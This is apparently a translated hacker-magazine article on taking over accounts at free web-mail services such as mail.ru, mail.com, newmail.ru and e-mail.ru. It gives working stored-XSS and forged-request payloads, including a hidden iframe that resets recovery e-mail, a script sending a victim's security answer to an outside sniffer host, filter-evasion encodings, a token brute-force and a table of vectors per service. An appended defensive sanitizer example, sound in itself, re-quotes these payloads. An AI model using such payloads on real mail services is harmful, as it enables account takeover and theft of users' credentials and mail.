
VULNERABILITY REVIEW OF FREE WEB-MAIL SERVICES

We continue with web-mail. I did a little research into hacking various services and present the results here. The attack technique is the same as before: a letter containing JavaScript code is sent to the target address; the script fires when the letter is opened and changes whatever it likes in the settings of the victim's mailbox. There is no point in describing every server in detail, since the approach is the same everywhere, so I will give a few examples and finish with a table. In most cases the attack can be considered 100% reliable, with some assumptions: the victim must read mail through the web interface, and when writing the exploits I assumed a standard platform, that is, no exotic OS or browser, and JavaScript execution enabled.

WWW.MAIL.RU

I'll start with mail service number one in Russia. At the moment, thanks to JavaScript getting through the filter plus one developer mistake, this mailbox can be hacked. I assume the basic principles are well known. How do you get the password? Option 1: change it directly. Fails: you need to know the current password. Option 2: change the secret question and use the password-reminder service. Doesn't work either. Option 3: set your own alternative e-mail to receive the new password generated by the system. Also fails: the last two options sit on the same form and are likewise protected by the current password. Even the remaining settings of less interest to us (name, surname and so on) can no longer be changed without entering the current password. It would seem there are no options left. However, there is a secondary, inconspicuous settings section, "Contact Information" (ICQ, website, phone, place of work, time zone, etc.), and it also lets you specify a contact e-mail. The trick is that what changes here is not the alternative address in the registration data but the one recorded in the profile (anketa), and the reminder service will send the password to that one. Simple. URL: http://win.mail.ru/cgi-bin/anketa?page=2&Email=hacker@antichat.ru However, mail.ru settings can no longer be changed with a GET request, so I will describe the technical side in detail.

I. We send a letter with code to the target mailbox. The code creates a frame directly in the body of the message, pointing at our site. Ideally the script should fire without any user involvement (no click, hover, image load, etc.):

 <embed src="javascript:document.getElementById('xxx').innerHTML='<iframe src=http://yoursite.yourdomain.ru/yourscript.html></iframe>';this.wav">
 <p id='xxx'>
To make the script fire reliably, and to hide it, we transform this into:
 <embed src="javascript:status=location;document.getElementById('xxx').innerHTML='<iframe src=http://yoursite.ru/yourscript.html width=0 height=0></iframe>';this.wav" width=0 height=0>
 <p id='xxx'>
In the actual letter, some letters in the words javascript and iframe are replaced with character codes (HTML entities), which the mail filter does not strip. The statement status=location; shows the local URL in the status bar so that stray flickering does not arouse suspicion. The width and height attributes of both the frame and the embed are set to zero, which makes them invisible.

II. On http://yoursite.ru we host an HTML document with a form that posts the modified data to the mail.ru server.

The content of yourscript.html:
 <form method="post" action="http://win.mail.ru/cgi-bin/anketa" name="anketa">
 <input type="hidden" name="page" value="2">
 <input type="hidden" name="Email" value="hacker@antichat.ru">
 <input type="hidden" name="Save" value="Save">
 </form>
 <script>
 document.anketa.submit();
 </script>
Notes: I guarantee that the client-side part works unchanged only in IE; the form is hosted on a separate site specifically to keep the letter itself small.


WWW.MAIL.COM

Now a slightly different security error, using http://mail.com as the example. If you use the password-reminder service, then to get the password it is enough to enter the correct answer to the security question (one of the offered options). So the task is to obtain that answer. This is easily done. When I went into the mailbox properties and looked at the registration information, I saw that the answer to the secret question was not hidden, which lets us read its value with JavaScript.

We inject the script through the style tag.
Settings page address: http://mail01.mail.com/scripts/common/genprofile.cgi
Form name: profileform
Name of the text field holding the secret answer: hint_a
So to steal the secret answer you need to load the settings page, run JavaScript, read the value document.profileform.hint_a.value, and pass it to the sniffer along with the REQUEST_URI environment variable.

Ready version:
 <style>@import url(javascript:document.getElementById('out').innerHTML="<iframe src=http://mail01.mail.com/scripts/common/genprofile.cgi name='zero' %6FnLoad=`str=document.zero.profileform.hint_a.value;path='http://zero.h12.ru/stat/capt.php?';document.zero.location=path+str`></iframe>");</style>
 <span id='out'></span>
The settings page is loaded into the generated frame named zero. When it has finished loading, the onLoad handler (written as %6FnLoad: the browser decodes the percent-escape inside the javascript: URL, while a filter looking for the literal word does not match it) runs the script that reads the secret answer and then, through the same frame, sends it to the sniffer. Now just open http://zero.h12.ru/stat/log.php and find the required information in the "Host" line.

WWW.NEWMAIL.RU

In my opinion it is a fairly popular mailer, so I will go into detail. Moreover, taking over someone else's account on it is much easier than it seems at first glance. You could do it like this: send a letter with a script that obtains the session id when it runs, generates the necessary requests, and changes the alternative e-mail (to which the password will then be sent) together with the secret question and answer. However, in the reminder form you can specify any other address and the password will be sent there, as long as the secret answer is correct. And one more observation: the session id is not needed at all to change the settings. Plus, any tags are allowed. All of this reduces the code to a couple of lines:
 <iframe src=http://newmail.ru/users/chpass.dhtml?cp_msg=1&cp_quest=QUESTION&cp_answ=ANSWER width=0 height=0></iframe>

WWW.E-MAIL.RU

The way e-mail.ru is hacked does not quite fit the general subject of the article, but it is mail nonetheless :). When I needed the password for one mailbox, I registered an account as usual and started studying the system. The first thing that caught my eye was the ability to set a new password and a secret question with answer without entering the old password. The usual plan: check the tag filtering, get the ID and make the request. However, to change the settings a special variable called utoken is used, which is contained in the body of the document. Having experimented with changing the question and answer with a previously known utoken (QUESTION and ANSWER are placeholders):
http://www.e-mail.ru/scripts/netauth.dll?cmd=passwd2&show=passwd.tpl&utoken=email@e-mail.ru-5a00&show=passwd.tpl&pass=&repass=&pquestion=QUESTION&panswer=ANSWER
I concluded that neither the ID nor cookies are required to change the settings. Observing utoken further, it turned out that the four-digit hexadecimal number after the e-mail address in email@e-mail.ru-5a00 lies in a very narrow range. Namely, to set a secret question and answer on any mailbox of interest, you only need to try 7 values: 5a00, 5b00, 5c00, 5d00, 5e00, 5f00, 6000. When the number is guessed, we get into the right box.

Notes: some things have changed since. The password-recovery service does not work, so it is advisable to change the password straight away. The settings-change address has also changed:
http://www.e-mail.ru/scripts/netauth.dll?cmd=passwd2&show=passwd.tpl&utoken=email@e-mail.ru-5a00&u_token=email@e-mail.ru-5c00&show=passwd.tpl&pass=&repass=&pquestion=QUESTION&panswer=ANSWER
The method does not always work; probably the user still has to log in via the web occasionally.

Table: characteristics of the free web-mail servers

SERVER (other domains served) | JAVASCRIPT VECTOR | VULNERABILITY
www.km.ru (km.ru) | img src=javascript: | The password can be read from the password field on the settings page
www.mail.ru (inbox.ru, bk.ru, list.ru) | embed src=javascript: | The alternative e-mail can be changed
www.mail.com (email.com, post.com, myself.com, consultant.com, etc.) | @import url(javascript:) | The settings page shows the answer to the security question
www.newmail.ru (nm.ru, hotmail.ru, orc.ru, nightmail.ru) | any way | Read/change the question and answer; the password issued is valid
www.netman.ru and www.mailgate.ru (the same mailer, about 80 domains) | img src=javascript:, style=background:url(javascript:) | The answer to the security question can be stolen, if one is set; a forwarding address can also be set (copies are not kept)
www.yandex.ru | OnError, OnLoad | Deletion of the user's *.narod.ru site (JS not required)
www.ukr.net | embed src=javascript: ... this.wav | Read the answer to the security question
www.nextmail.ru (xaker.ru, email.su, russian.ru, students.ru, programist.ru, designer.ru, mail2k.ru) | embed src="javascript: | Change/steal the answer to the security question
www.hotbox.ru (pochta.ru, pisem.net, fromru.com, land.ru, etc.) | in many ways | Account deletion
www.rin.ru | embed src=javascript: | Read the secret answer
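The vectors in the table (embed/img src=javascript:, @import url(javascript:) inside a style tag, entity-encoded letters in the words javascript and iframe, and the %6FnLoad spelling of onLoad from the mail.com payload) all get past a filter that looks for literal keywords. As an added example, not code from the article or from any of the services it lists, the block below puts such a keyword filter next to a normalise-then-allowlist sanitizer and runs both over constructed payloads in the shapes shown on this page. The hosts in the samples are the page's own; the sanitizer's tag grammar is a deliberately minimal regex tokenizer rather than a full HTML parser.

```javascript
// Added example, not code from the article or from any mail service it names.
// It contrasts the kind of substring filter the reviewed services relied on
// with a normalise-then-allowlist sanitizer. Sample inputs are constructed in
// the shapes the page shows; the tag/attribute grammar handled here is
// deliberately minimal and is not a full HTML parser.

const ALLOWED_TAGS = new Set(["p", "br", "b", "i", "u", "a", "img", "span", "div", "font"]);
const URL_ATTRS = new Set(["href", "src"]);

// A 2003-vintage filter: it recognises the forbidden words only when they are
// spelled literally, and only in the places it expects them.
function naiveFilter(html) {
  return html
    .replace(/<\/?script\b/gi, "")
    .replace(/\son\w+\s*=/gi, " ")                                   // onload=, onerror=, ...
    .replace(/(src|href)\s*=\s*(["']?)\s*javascript:/gi, "$1=$2"); // src=javascript:
}

// HTML numeric entities: the browser turns "&#106;avascript:" in an attribute
// value back into "javascript:" before it resolves the URL, so a filter that
// looks for the literal word never sees it.
function decodeEntities(s) {
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => String.fromCharCode(parseInt(d, 10)));
}

// Bring a URL into the form the browser will act on: decode entities, then
// percent-escapes (resolved inside a javascript: URL, which is how "%6FnLoad"
// becomes "onLoad" in the mail.com payload), then drop the control characters
// and whitespace that legacy browsers ignored inside "java<TAB>script:".
function normalizeUrl(v) {
  return decodeEntities(v)
    .replace(/%([0-9a-f]{2})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/[\u0000-\u0020]/g, "")
    .toLowerCase();
}

// Allowlist, not blocklist: only absolute http(s) URLs survive in href/src.
function safeUrl(v) {
  return /^https?:\/\//.test(normalizeUrl(v));
}

// Either a complete tag (quote-aware, so a '>' inside an attribute value does
// not end it) or a bare '<' that did not start a well-formed tag.
const TAG_RE = /<(\/?)([a-z][a-z0-9]*)((?:"[^"]*"|'[^']*'|[^>"'])*)>|</gi;
const ATTR_RE = /([^\s=\/]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+)))?/g;

function sanitize(html) {
  // <style> and <script> go, contents included: "@import url(javascript:" in a
  // style sheet executes and is not an attribute a URL check would ever see.
  const stripped = html.replace(/<(style|script)\b[^>]*>[\s\S]*?<\/\1\s*>/gi, "");
  return stripped.replace(TAG_RE, (m, slash, rawName, rawAttrs) => {
    if (rawName === undefined) return "&lt;";        // stray '<': neutralise it
    const name = rawName.toLowerCase();
    if (!ALLOWED_TAGS.has(name)) return "";           // embed, iframe, object, ...
    if (slash) return `</${name}>`;
    const kept = [];
    for (const a of rawAttrs.matchAll(ATTR_RE)) {
      const aname = decodeEntities(a[1]).toLowerCase();
      const value = a[2] ?? a[3] ?? a[4] ?? "";
      if (aname.startsWith("on") || aname === "style") continue; // handlers, CSS
      if (URL_ATTRS.has(aname) && !safeUrl(value)) continue;
      kept.push(`${aname}="${value.replace(/"/g, "&quot;")}"`);
    }
    return `<${name}${kept.length ? " " + kept.join(" ") : ""}>`;
  });
}

// Constructed samples in the shapes the article shows (hosts are the page's own).
const SAMPLES = {
  mailru_embed: `<embed src="&#106;avascript:document.getElementById('xxx').innerHTML='<iframe src=http://yoursite.ru/yourscript.html width=0 height=0></iframe>';this.wav" width=0 height=0><p id='xxx'>`,
  mailcom_style: `<style>@import url(javascript:document.getElementById('out').innerHTML="<iframe src=http://mail01.mail.com/scripts/common/genprofile.cgi name='zero' %6FnLoad=document.zero.location='http://zero.h12.ru/stat/capt.php?'+document.zero.profileform.hint_a.value></iframe>");</style><span id='out'></span>`,
  newmail_iframe: `<iframe src=http://newmail.ru/users/chpass.dhtml?cp_msg=1&cp_quest=QUESTION&cp_answ=ANSWER width=0 height=0></iframe>`,
  benign: `<p>Hello <a href="https://example.com/">link</a> <img src="http://example.com/a.gif"></p>`,
};

for (const [label, html] of Object.entries(SAMPLES)) {
  console.log(label, "| keyword filter:", naiveFilter(html) === html ? "unchanged" : "altered",
              "| allowlist:", JSON.stringify(sanitize(html)));
}
```

The point is the order of operations: decode every transformation the browser will apply (entities, percent-escapes, stray whitespace) before deciding, and then keep only what is on an allowlist rather than strip what is on a blocklist. The newmail.ru one-liner shows why the URL check alone is not enough: an iframe pointing at a plain http URL carries the victim's session to a state-changing page, so the element itself has to be disallowed.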